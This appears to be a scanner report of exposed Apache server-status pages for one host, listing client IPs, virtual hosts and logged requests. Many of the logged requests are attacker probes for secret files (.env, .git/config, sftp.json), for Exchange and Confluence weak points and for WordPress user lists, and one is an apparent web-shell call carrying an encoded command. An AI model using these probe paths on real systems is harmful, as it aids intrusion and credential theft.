178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-6716916220/1/7634_ 0.030032697560.00.00126.00 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-6716916220/1/7437_ 0.040017422300.00.00137.23 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-6716916220/0/7505_ 0.0002824327710.00.00125.77 139.144.150.45http/1.1 0-6716916220/2/7386_ 0.030016718380.00.0198.56 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-6716916200/2/7343_ 0.031018783270.00.00105.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6716916200/1/7265_ 0.030027027990.00.00138.27 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-6716916200/0/7313_ 0.0003016025200.00.00206.65 209.206.24.44h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6716916200/2/7338_ 0.030024233230.00.01139.66 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-6716916200/1/7583_ 0.030022048510.00.00117.06 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-6716916200/1/7619_ 0.030021603860.00.00138.22 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-6716916200/0/7185_ 0.00047623516550.00.0094.96 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-6716916200/2/7653_ 0.030015221660.00.00127.37 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-6716916200/1/7727_ 0.021020005530.00.00139.39 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-6716916200/0/7760_ 0.001013585340.00.00134.52 172.70.100.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6716917510/4/6447_ 0.060029506290.00.1798.87 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-6716917510/2/6543_ 0.060012889790.00.00112.44 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-6716917510/4/6192_ 0.060014162010.00.00120.95 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-6716917510/2/6288_ 0.060034272620.00.00134.62 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-6716917510/1/6780_ 0.051015216110.00.00170.31 139.144.150.45http/1.1 2-6716917510/1/6054_ 0.060032454570.00.00117.00 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-6716917510/0/6329_ 0.000020702850.00.00133.89 178.62.73.12http/1.1 2-6716917510/1/6108_ 0.060026980060.00.00134.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-6716917510/3/6696_ 0.060029104080.00.00126.17 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-6716917510/2/6176_ 0.060025015690.00.01124.74 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-6716916210/1/5163_ 0.0203729892440.00.00124.63 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\x04\x01 3-6716916210/1/5648_ 0.020026978780.00.00129.31 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-6716916210/0/5609_ 0.0005727241260.00.0095.98 139.144.150.45http/1.1 3-6716916210/2/5208R 0.020044977500.00.00103.31 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-6716916210/2/5323_ 0.020023896820.00.00143.94 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-6716916210/1/5289_ 0.020016695230.00.0076.92 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-6716916210/1/5581_ 0.020028162340.00.00109.00 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-6716916210/0/5396_ 0.0002818431920.00.00117.22 185.210.245.100h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6716916210/2/5377_ 0.020041373320.00.0080.37 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-6716916210/2/5155_ 0.030020475280.00.0083.23 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-6716916190/2/5496_ 0.060024694170.00.00106.73 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-6716916190/1/5325_ 0.0003331040740.00.00112.52 139.144.150.45h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-6716916190/1/5426_ 0.080014133390.00.01133.59 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-6716916190/2/4981_ 0.060034077730.00.01164.25 139.144.150.45http/1.1 4-6716916190/3/5246_ 0.080025154210.00.0196.52 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-6716916190/2/5038_ 0.080011955560.00.00144.89 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-6716916190/1/5331_ 0.05080012970710.00.03
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7551cd5a536
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 07-Jan-2024 01:44:44 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 8 days 15 hours 23 minutes 31 seconds Server load: 0.05 0.03 0.00 Total accesses: 252511 - Total Traffic: 4.4 GB - Total Duration: 90509954 CPU Usage: u60.34 s58.82 cu1152.27 cs805.61 - .278% CPU load .338 requests/sec - 6.2 kB/second - 18.2 kB/request - 358.44 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01555681no0yes010000 11555811no0yes19000 21555680no1yes010000 31555678no0yes010000 41555679no0yes010000 Sum501 149000 ____________W_____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4515556810/69/5948_ 10.92150228342420.00.33103.74 162.158.90.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/74/5823_ 10.9168015381120.00.35105.43 121.17.125.5http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/72/5967_ 10.91150013444570.00.3196.57 172.69.34.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/79/6203_ 10.9169027037470.00.34136.52 162.158.90.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/69/6040_ 10.327497816126550.00.7686.18 172.71.175.48h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/74/5608_ 11.1968020518100.00.4891.82 172.70.185.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/66/6256_ 10.866993829259440.01.12105.15 108.162.226.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/74/6087_ 11.2273012455460.00.86116.77 172.69.33.171h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-4515556810/74/5896_ 10.923021146870.00.3587.90 161.35.176.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-4515556810/81/5834_ 11.2274013093670.00.5068.77 172.69.33.250h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4515558110/242/6561_ 17.324016308370.02.0775.69 172.70.185.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4515558110/251/6233_ 17.2233324328570.02.33118.38 161.35.176.95http/1.1 1-4515558110/218/6471W 17.360012383640.01.85172.04 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-4515558110/214/6471_ 17.361021378160.03.48111.12 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-4515558110/201/6583_ 16.90277319125110.02.4598.20 161.35.176.95http/1.1 1-4515558110/236/6653_ 17.361119025160.03.5993.86 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-4515558110/212/6372_ 17.240021119370.02.5775.60 108.162.212.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-4515558110/285/6522_ 17.122111475900.02.42109.19 161.35.176.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-4515558110/213/6789_ 17.360017508200.04.46119.64 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-4515558110/270/6748_ 17.331011004060.02.21116.51 172.69.34.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4515556800/393/4847_ 18.683017256840.04.0872.94 161.35.176.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4515556800/256/4866_ 18.68309426300.03.6679.66 161.35.176.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4515556800/279/4441_ 18.731010376150.03.2793.23 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-4515556800/246/4605_ 18.730030080050.04.4583.99 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-4515556800/299/4552_ 18.66244511087730.06.03111.32 161.35.176.95http/1.1 2-4515556800/279/4280_ 18.702028780430.03.7473.04 161.35.176.95h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-4515556800/286/4429_ 18.682016553110.04.1683.74 161.35.176.95http/1.1 2-4515556800/263/4440_ 18.710021952520.03.5593.64 172.70.185.165h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-4515556800/359/4656_ 18.740025258430.04.1286.92 161.35.176.95http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-4515556800/319/4600_ 18.6633421212080.04.9674.14 161.35.176.95http/1.1 3-4515556780/80/3589_ 11.1574022099000.01.3867.79 172.69.33.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/83/3515_ 10.851032015493460.01.4550.36 172.69.34.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/71/3639_ 10.8674817801640.01.4166.03 172.69.33.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/43/3811_ 9.961032129523860.00.5860.55 108.162.227.103h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/43/3802_ 10.861032018467100.00.4066.13 162.158.90.6h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/79/3561_ 10.8669011200480.01.7950.77 162.158.91.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/63/3810_ 11.1674018517570.00.9184.21 172.69.34.132h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/74/3805_ 10.8769111905720.01.3178.57 162.158.90.58h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/57/3681_ 10.8768526284840.00.5852.00 162.158.90.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-4515556780/54/3642_ 10.7669013023210.00.7247.89 172.71.10.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/61/4786_ 11.25150522158410.00.3093.08 172.69.34.18h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/75/4507_ 11.2567012174280.00.6684.83 172.69.34.166h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/68/4776_ 11.6072012458880.00.7391.36 172.69.33.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/56/4323_ 10.61697530964960.00.20138.34 113.161.72.135http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/60/4536_ 11.1674023251590.00.6673.28 172.70.202.74http/1.1 4-4515556790/62/4177_ 11.53721979501150.00.21106.35 172.69.65.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-4515556790/70/4506_ 11.607409680140.00.3889.27 172.69.34.28h2tandemsl.com
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7554982cafe
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 05-Jan-2024 19:25:33 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 7 days 9 hours 4 minutes 20 seconds Server load: 0.00 0.03 0.02 Total accesses: 235050 - Total Traffic: 4.1 GB - Total Duration: 83902624 CPU Usage: u35.46 s39.52 cu1050.94 cs713.75 - .289% CPU load .369 requests/sec - 6.7 kB/second - 18.3 kB/request - 356.956 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01507115no0yes19000 11507244no0yes010000 21507114no0yes010000 31507112no0yes010000 41507113no0yes010000 Sum500 149000 _______W__________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3815071150/126/5557_ 7.6246127645860.01.3897.53 188.114.102.141h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/120/5421_ 7.580014513530.01.70100.65 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3815071150/120/5557_ 7.580112664860.00.5089.77 161.35.27.144http/1.1 0-3815071150/127/5778_ 7.600026085070.00.60130.04 161.35.27.144http/1.1 0-3815071150/134/5652_ 7.620015396470.01.8881.78 172.71.170.150h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/125/5183_ 7.604638319701550.01.2576.02 172.69.65.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/154/5864_ 7.645151828304530.01.16100.21 172.69.65.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/130/5668W 7.640011682170.00.51112.93 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3815071150/143/5509_ 7.5746020390860.00.8582.20 188.114.102.19h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3815071150/140/5412_ 7.680112068880.00.9365.49 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-3815072440/131/6146_ 6.998456014918480.01.0571.30 172.71.219.56h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/137/5836_ 6.791014786330.013.66114.20 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3815072440/133/6080_ 6.560111077190.00.55166.24 103.77.246.251http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/135/6086_ 6.6670020078300.00.5990.43 172.71.166.200h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/130/6224_ 6.790017818350.00.3893.79 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3815072440/134/6252_ 6.857525117508660.01.4574.75 172.71.147.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/129/5977_ 7.050019735040.01.3668.93 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3815072440/127/6078_ 7.00094410023690.00.77103.26 172.71.154.224h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/134/6396_ 7.0175015994420.01.04112.28 172.71.214.96h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3815072440/130/6318_ 6.997009408440.01.12112.66 172.71.218.6h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/45/4324_ 5.26103015976260.00.9766.38 172.71.218.251h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/49/4469_ 5.2310318098090.00.3073.77 172.71.218.243h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/50/4025_ 5.30008676730.00.2681.10 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3815071140/54/4216_ 5.240028655580.00.6476.09 161.35.27.144http/1.1 2-3815071140/40/4098_ 4.9710409720330.01.18103.09 103.77.246.251http/1.1 2-3815071140/52/3849_ 4.900027452770.00.3966.65 172.71.218.153h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/44/4007_ 4.89104015081520.00.2375.96 172.71.218.54h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/46/4040_ 5.240020691940.00.3887.37 161.35.27.144http/1.1 2-3815071140/45/4144_ 5.0110415012418820.00.4479.58 103.77.246.251http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3815071140/47/4121_ 5.260119979300.00.8264.68 161.35.27.144http/1.1 3-3815071120/48/3457_ 5.7978021810380.00.9764.62 172.71.218.254h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/40/3384_ 5.4484015172970.00.1948.22 172.71.218.197h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/36/3515_ 5.810017482000.00.5862.21 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3815071120/43/3697_ 5.7975029263030.00.4258.05 172.71.218.75h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/49/3702_ 5.8275018281970.01.1863.97 172.71.214.201h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/41/3426_ 5.4370210863850.00.7348.31 172.71.218.213h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/36/3691_ 5.4370018290730.00.3681.16 172.71.219.114h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/45/3695_ 5.8275011681080.00.5675.88 172.71.214.217h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/39/3582_ 5.8079026143820.00.2350.96 172.71.218.161h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/47/3518_ 5.5070012811280.00.2846.42 172.71.166.211h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/58/4407_ 6.8976021345870.01.6088.82 172.71.214.88h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/48/4119_ 6.8576011269480.01.1778.69 172.71.219.13h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/49/4396_ 6.930011617740.01.1986.34 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-3815071130/51/3948_ 6.921130110310.01.10133.77 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-3815071130/63/4148_ 6.920022429820.01.6467.72 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3815071130/52/3793_ 6.857108775820.01.36103.61 172.71.219.87h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/44/4121_ 6.611458876780.00.3584.16 162.158.22.166h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755d6c5b3cd
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 24-Dec-2023 02:51:45 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 95 Parent Server MPM Generation: 94 Server uptime: 17 days 19 hours 10 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 387062 - Total Traffic: 10.3 GB - Total Duration: 205621318 CPU Usage: u56.73 s72.55 cu2114.4 cs1624.78 - .252% CPU load .252 requests/sec - 7.0 kB/second - 28.0 kB/request - 531.236 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0912544no0yes010000 1912591no0yes010000 2912592no2yes010000 3912593no0yes19000 4912678no1yes010000 Sum503 149000 ________________________________W_________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-949125440/16/6732_ 4.0995038545060.00.25172.71 80.85.87.117http/1.1barrerasdecontencion.com:80GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm9 0-949125440/19/7308_ 5.191350653740.00.92202.47 172.70.246.83h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/17/7353_ 5.62603027657020.00.12216.78 198.41.230.205h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/13/6707_ 5.19100033770330.00.06210.79 172.70.247.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/18/6939_ 5.19597037550960.00.11173.05 172.70.247.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/12/7234_ 5.19598031869790.00.81229.94 172.70.247.20h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/14/6991_ 5.801023220770.00.26207.60 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-949125440/11/7337_ 5.77101042125940.00.28162.79 172.70.105.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/12/6580_ 5.19603033422040.00.13236.89 172.70.246.246h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/18/7105_ 5.13955349338140.00.16254.02 37.97.129.228http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/20/6609_ 5.5295018600250.00.09221.25 172.70.105.141h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/19/6351_ 4.6796029825080.00.39146.55 172.68.96.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/15/6085_ 5.5296036518050.00.01156.10 162.158.193.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/21/6466_ 5.33972643192800.00.05231.70 162.158.189.249h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/20/5906_ 5.311012529703740.01.09231.68 172.71.214.37h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/19/6684_ 5.52950133922110.00.96226.47 172.69.90.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/19/6424_ 5.52100035733830.00.21126.86 172.70.105.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/16/6168_ 5.29962532427120.00.91200.27 172.71.210.232h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/17/6245_ 5.3895087544420.00.47130.91 198.41.230.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/22/6028_ 5.31962323268670.00.23128.83 162.158.189.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/103/7738_ 9.558027446410.00.83147.08 198.41.230.80h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/102/7706_ 9.831051670150.00.66219.17 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-949125920/119/7483_ 9.7386842360340.01.72222.80 184.168.96.123http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/100/7815_ 9.7483026478390.01.59213.67 172.71.186.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/98/7888_ 9.82390628077550.00.81253.54 172.70.55.160h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/85/8029_ 9.772020689450.01.08176.07 137.184.106.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-949125920/101/7288_ 9.8122428085800.01.53195.49 137.184.106.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-949125920/112/7453_ 9.79476730427740.01.57206.58 172.70.135.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/119/7779_ 9.773033300150.01.77227.47 137.184.106.30http/1.1 2-949125920/114/7132_ 9.824039308230.00.85209.94 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-949125930/30/7678_ 6.151026043570.00.27275.12 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-949125930/33/8044_ 5.9033125239540.00.17189.38 137.184.106.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-949125930/22/8121W 5.970055020260.00.94171.48 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-949125930/32/8001_ 5.9751046705850.00.45143.61 198.41.230.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/33/7663_ 5.8622833108510.00.32207.01 137.184.106.30http/1.1 3-949125930/28/8081_ 5.92972535023470.00.18152.29 172.68.150.30h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/26/8109_ 5.91972525685260.01.04180.64 162.158.163.174h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/20/8174_ 6.13515232475410.01.88194.90 212.38.40.210http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 3-949125930/22/7695_ 